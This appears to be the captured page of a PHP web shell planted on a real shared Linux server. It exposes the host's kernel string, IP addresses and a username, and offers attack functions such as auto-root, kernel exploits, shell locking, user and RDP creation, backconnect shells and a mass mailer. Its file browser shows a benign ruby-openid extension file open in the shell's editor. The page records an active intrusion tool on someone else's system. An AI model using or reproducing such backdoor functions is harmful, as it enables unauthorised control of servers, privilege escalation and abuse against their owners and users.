Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
openid /
extensions /
[ HOME SHELL ]
Name
Size
Permission
Action
ax.rb
17.32
KB
-rw-r--r--
oauth.rb
2.48
KB
-rw-r--r--
pape.rb
5.94
KB
-rw-r--r--
sreg.rb
9.37
KB
-rw-r--r--
ui.rb
1.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ui.rb
# An implementation of the OpenID User Interface Extension 1.0 - DRAFT 0.5 # see: http://svn.openid.net/repos/specifications/user_interface/1.0/trunk/openid-user-interface-extension-1_0.html require 'openid/extension' module OpenID module UI NS_URI = "http://specs.openid.net/extensions/ui/1.0" class Request < Extension attr_accessor :lang, :icon, :mode, :ns_alias, :ns_uri def initialize(mode = nil, icon = nil, lang = nil) @ns_alias = 'ui' @ns_uri = NS_URI @lang = lang @icon = icon @mode = mode end def get_extension_args ns_args = {} ns_args['lang'] = @lang if @lang ns_args['icon'] = @icon if @icon ns_args['mode'] = @mode if @mode return ns_args end # Instantiate a Request object from the arguments in a # checkid_* OpenID message # return nil if the extension was not requested. def self.from_openid_request(oid_req) ui_req = new args = oid_req.message.get_args(NS_URI) if args == {} return nil end ui_req.parse_extension_args(args) return ui_req end # Set UI extension parameters def parse_extension_args(args) @lang = args["lang"] @icon = args["icon"] @mode = args["mode"] end end end end
Close